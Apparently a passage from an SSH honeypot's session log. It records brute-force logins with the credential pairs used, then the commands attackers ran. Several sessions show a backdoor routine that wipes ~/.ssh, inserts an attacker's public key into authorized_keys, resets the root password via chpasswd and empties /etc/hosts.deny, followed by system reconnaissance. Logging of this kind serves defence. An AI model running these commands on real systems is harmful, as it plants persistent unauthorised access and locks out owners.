  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
195.178.110.228
2026-06-30 00:56:32.545687 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: ce6278bca6f4
Client Version: Unknown
Engagement Duration: 0.6s
{
  "id": "ce6278bca6f4",
  "src_ip": "195.178.110.228",
  "start_time": "2026-06-30T00:56:32.545687Z",
  "end_time": "2026-06-30T00:56:33.107187Z",
  "duration": "0.6",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
180.76.233.159
2026-06-30 00:53:57.595278 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 100

Credential acceptance event recorded. Target authentication: root / 1

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ uname -a
Record ID: d5e925fc017e
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "d5e925fc017e",
  "src_ip": "180.76.233.159",
  "start_time": "2026-06-30T00:53:57.595278Z",
  "end_time": "2026-06-30T00:53:58.842167Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "1"
  },
  "commands": [
    "uname -a"
  ],
  "detailed_commands": [
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 100,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
180.76.233.159
2026-06-30 00:53:55.591190 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: pi

Record ID: 2e3bb32bbae1
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "2e3bb32bbae1",
  "src_ip": "180.76.233.159",
  "start_time": "2026-06-30T00:53:55.591190Z",
  "end_time": "2026-06-30T00:53:57.430690Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "pi",
      "pass": "nanopi"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
124.220.61.209
2026-06-30 00:17:15.142229 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 278429d817eb
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 14.5s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "278429d817eb",
  "src_ip": "124.220.61.209",
  "start_time": "2026-06-30T00:17:15.142229Z",
  "end_time": "2026-06-30T00:17:29.639856Z",
  "duration": "14.5",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
124.220.61.209
2026-06-30 00:17:01.144159 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: b34db23607d7
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "b34db23607d7",
  "src_ip": "124.220.61.209",
  "start_time": "2026-06-30T00:17:01.144159Z",
  "end_time": "2026-06-30T00:19:01.150718Z",
  "duration": "120.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
124.220.61.209
2026-06-30 00:16:57.989043 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 340

Credential acceptance event recorded. Target authentication: root / 123qwe123

Remote entity achieved interactive shell state. Command sequence (19 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
[obs-node]:~$ cat /proc/cpuinfo | grep name | wc -l
[obs-node]:~$ echo "root:eACxzDO2Am9G"|chpasswd|bash
[obs-node]:~$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
[obs-node]:~$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
[obs-node]:~$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
[obs-node]:~$ ls -lh $(which ls)
[obs-node]:~$ which ls
[obs-node]:~$ crontab -l
[obs-node]:~$ w
[obs-node]:~$ uname -m
[obs-node]:~$ cat /proc/cpuinfo | grep model | grep name | wc -l
[obs-node]:~$ top
[obs-node]:~$ uname
[obs-node]:~$ uname -a
[obs-node]:~$ whoami
[obs-node]:~$ lscpu | grep Model
[obs-node]:~$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
Record ID: d56122f7ee0d
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 40.4s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "d56122f7ee0d",
  "src_ip": "124.220.61.209",
  "start_time": "2026-06-30T00:16:57.989043Z",
  "end_time": "2026-06-30T00:17:38.429680Z",
  "duration": "40.4",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123qwe123"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
    "cat /proc/cpuinfo | grep name | wc -l",
    "echo \"root:eACxzDO2Am9G\"|chpasswd|bash",
    "rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
    "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
    "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
    "ls -lh $(which ls)",
    "which ls",
    "crontab -l",
    "w",
    "uname -m",
    "cat /proc/cpuinfo | grep model | grep name | wc -l",
    "top",
    "uname",
    "uname -a",
    "whoami",
    "lscpu | grep Model",
    "df -h | head -n 2 | awk 'FNR == 2 {print $2;}'"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep name | wc -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "echo \"root:eACxzDO2Am9G\"|chpasswd|bash",
      "failed": false,
      "error": null
    },
    {
      "cmd": "rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ls -lh $(which ls)",
      "failed": false,
      "error": null
    },
    {
      "cmd": "which ls",
      "failed": false,
      "error": null
    },
    {
      "cmd": "crontab -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "w",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -m",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo | grep model | grep name | wc -l",
      "failed": false,
      "error": null
    },
    {
      "cmd": "top",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    },
    {
      "cmd": "whoami",
      "failed": false,
      "error": null
    },
    {
      "cmd": "lscpu | grep Model",
      "failed": false,
      "error": null
    },
    {
      "cmd": "df -h | head -n 2 | awk 'FNR == 2 {print $2;}'",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 340,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
185.242.3.195
2026-06-30 00:15:56.476079 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: ubuntu / deploy123

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo OK
Record ID: c68695525cf9
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "c68695525cf9",
  "src_ip": "185.242.3.195",
  "start_time": "2026-06-30T00:15:56.476079Z",
  "end_time": "2026-06-30T00:15:57.636647Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "ubuntu",
    "pass": "deploy123"
  },
  "commands": [
    "echo OK"
  ],
  "detailed_commands": [
    {
      "cmd": "echo OK",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
111.230.30.28
2026-06-30 00:10:16.632437 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 2a219a84faea
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "2a219a84faea",
  "src_ip": "111.230.30.28",
  "start_time": "2026-06-30T00:10:16.632437Z",
  "end_time": "2026-06-30T00:12:16.708287Z",
  "duration": "120.1",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
138.99.80.102
2026-06-30 00:07:21.662101 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: ca1d62d480cd
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 0.9s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "ca1d62d480cd",
  "src_ip": "138.99.80.102",
  "start_time": "2026-06-30T00:07:21.662101Z",
  "end_time": "2026-06-30T00:07:22.525087Z",
  "duration": "0.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
138.99.80.102
2026-06-30 00:07:19.669599 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: d37073fcc1de
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.9s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "d37073fcc1de",
  "src_ip": "138.99.80.102",
  "start_time": "2026-06-30T00:07:19.669599Z",
  "end_time": "2026-06-30T00:07:21.528557Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
138.99.80.102
2026-06-30 00:07:17.860158 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / He123456789

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 83e6ebe20894
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 4.7s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "83e6ebe20894",
  "src_ip": "138.99.80.102",
  "start_time": "2026-06-30T00:07:17.860158Z",
  "end_time": "2026-06-30T00:07:22.521291Z",
  "duration": "4.7",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "He123456789"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
209.141.41.212
2026-06-30 00:04:45.555224 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: fc0673cc4fbe
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 0.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "fc0673cc4fbe",
  "src_ip": "209.141.41.212",
  "start_time": "2026-06-30T00:04:45.555224Z",
  "end_time": "2026-06-30T00:04:45.793102Z",
  "duration": "0.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
209.141.41.212
2026-06-30 00:04:44.304797 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: c19d60345fef
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "c19d60345fef",
  "src_ip": "209.141.41.212",
  "start_time": "2026-06-30T00:04:44.304797Z",
  "end_time": "2026-06-30T00:04:45.530956Z",
  "duration": "1.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
209.141.41.212
2026-06-30 00:04:43.787579 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / qQ@123456

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 663a23040ac4
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.0s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "663a23040ac4",
  "src_ip": "209.141.41.212",
  "start_time": "2026-06-30T00:04:43.787579Z",
  "end_time": "2026-06-30T00:04:45.789268Z",
  "duration": "2.0",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "qQ@123456"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
183.238.41.121
2026-06-30 00:00:38.918401 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: af1b4a2013c0
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "af1b4a2013c0",
  "src_ip": "183.238.41.121",
  "start_time": "2026-06-30T00:00:38.918401Z",
  "end_time": "2026-06-30T00:00:38.918401Z",
  "duration": "120.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
183.238.41.121
2026-06-29 23:58:37.731895 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 3f8f8002ae35
Client Version: Unknown
Engagement Duration: 0.3s
{
  "id": "3f8f8002ae35",
  "src_ip": "183.238.41.121",
  "start_time": "2026-06-29T23:58:37.731895Z",
  "end_time": "2026-06-29T23:58:38.012347Z",
  "duration": "0.3",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
180.76.233.159
2026-06-29 23:55:47.336794 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: a9c44706c1c9
Client Version: Unknown
Engagement Duration: 0.0s
{
  "id": "a9c44706c1c9",
  "src_ip": "180.76.233.159",
  "start_time": "2026-06-29T23:55:47.336794Z",
  "end_time": "2026-06-29T23:55:47.340074Z",
  "duration": "0.0",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
45.164.251.106
2026-06-29 23:54:40.276834 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: qwest

Record ID: 6793abf18767
Client Version: SSH-2.0-Go
Engagement Duration: 2.0s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "6793abf18767",
  "src_ip": "45.164.251.106",
  "start_time": "2026-06-29T23:54:40.276834Z",
  "end_time": "2026-06-29T23:54:42.266776Z",
  "duration": "2.0",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "qwest",
      "pass": "Qwest!2024!"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
45.164.251.106
2026-06-29 23:54:38.010648 UTC
COMMANDS RUN SUCCESSFUL LOGIN RECONNAISSANCE SCORE: 100

Credential acceptance event recorded. Target authentication: ubuntu / Qwest!2024!

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ uname -a
Record ID: 0aad2936bc02
Client Version: SSH-2.0-Go
Engagement Duration: 2.1s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "0aad2936bc02",
  "src_ip": "45.164.251.106",
  "start_time": "2026-06-29T23:54:38.010648Z",
  "end_time": "2026-06-29T23:54:40.085615Z",
  "duration": "2.1",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "ubuntu",
    "pass": "Qwest!2024!"
  },
  "commands": [
    "uname -a"
  ],
  "detailed_commands": [
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 100,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE"
  ]
}
45.164.251.106
2026-06-29 23:54:36.371500 UTC
COMMANDS RUN SUCCESSFUL LOGIN RECONNAISSANCE SCORE: 100

Credential acceptance event recorded. Target authentication: root / Qwest!2024!

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ uname -a
Record ID: 6b82ac57f589
Client Version: SSH-2.0-Go
Engagement Duration: 1.4s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "6b82ac57f589",
  "src_ip": "45.164.251.106",
  "start_time": "2026-06-29T23:54:36.371500Z",
  "end_time": "2026-06-29T23:54:37.820455Z",
  "duration": "1.4",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Qwest!2024!"
  },
  "commands": [
    "uname -a"
  ],
  "detailed_commands": [
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 100,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN",
    "RECONNAISSANCE"
  ]
}
45.148.10.239
2026-06-29 23:41:14.429970 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: user / admin

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo OK
Record ID: 8c2b870de53e
Client Version: SSH-2.0-Go
Engagement Duration: 1.1s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "8c2b870de53e",
  "src_ip": "45.148.10.239",
  "start_time": "2026-06-29T23:41:14.429970Z",
